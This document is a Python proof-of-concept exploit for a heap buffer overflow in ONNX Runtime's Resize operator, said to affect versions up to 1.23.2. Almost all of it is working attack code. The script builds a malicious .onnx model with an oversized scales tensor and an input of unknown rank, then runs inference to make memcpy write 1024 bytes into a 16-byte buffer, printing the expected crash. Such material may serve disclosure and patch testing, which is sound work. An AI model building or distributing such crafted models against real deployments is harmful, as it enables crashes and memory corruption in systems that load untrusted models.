#!/usr/bin/env python3 """ PoC: ONNX Runtime Resize Op - Heap Buffer Overflow via ParseScalesData Affected: onnxruntime <= 1.23.2 (all platforms) Trigger: Load and run crafted .onnx model → segfault """ import numpy as np import onnx from onnx import helper, TensorProto, numpy_helper def create_malicious_model(output_path="poc_resize_overflow.onnx", n_scales=256): """ Build malicious ONNX model with oversized scales tensor in Resize op. The scales tensor has n_scales elements, but input is 4D (rank=4). This causes memcpy to write n_scales*4 bytes into a 4*4=16 byte buffer. """ # Scales tensor: 256 floats (attacker-controlled content) malicious_scales = np.full(n_scales, 2.0, dtype=np.float32) # Resize node: X[0], roi[1]=empty, scales[2]=malicious resize_node = helper.make_node( "Resize", inputs=["X", "", "scales"], outputs=["Y"], mode="nearest", ) # X: NO shape annotation → rank unknown at graph construction time # This prevents scales caching (opset >= 18 requires rank > 0 to cache) X_input = helper.make_tensor_value_info("X", TensorProto.FLOAT, None) Y_output = helper.make_tensor_value_info("Y", TensorProto.FLOAT, None) # Scales as model initializer (constant but NOT cached due to unknown rank) scales_init = numpy_helper.from_array(malicious_scales, name="scales") graph = helper.make_graph( [resize_node], "poc_resize_overflow", [X_input], [Y_output], initializer=[scales_init], ) model = helper.make_model( graph, opset_imports=[helper.make_opsetid("", 19)] ) model.ir_version = 9 onnx.save(model, output_path) print(f"[+] Malicious model saved: {output_path}") print(f" scales tensor: {n_scales} elements (expected: 4 for NCHW input)") print(f" opset: 19, input X shape: dynamic (rank unknown)") return output_path def trigger(model_path): """Load and run the malicious model to trigger heap overflow.""" import onnxruntime as ort print(f"\n[*] Loading model: {model_path}") opts = ort.SessionOptions() opts.log_severity_level = 3 sess = ort.InferenceSession(model_path, opts) # 4D NCHW input → scales_array = InlinedVector(4) in Compute() # memcpy writes 256*4=1024 bytes into 4*4=16 byte buffer → CRASH input_data = np.random.randn(1, 3, 8, 8).astype(np.float32) print("[*] Running inference...") print(" scales_array capacity: ~16 bytes (4 floats)") print(" memcpy size: 1024 bytes (256 floats)") print(" expected: heap/stack corruption -> crash") try: sess.run(None, {"X": input_data}) print("[?] No crash detected") except Exception as e: print(f"[!] Exception: {e}") if __name__ == "__main__": model_path = create_malicious_model() trigger(model_path)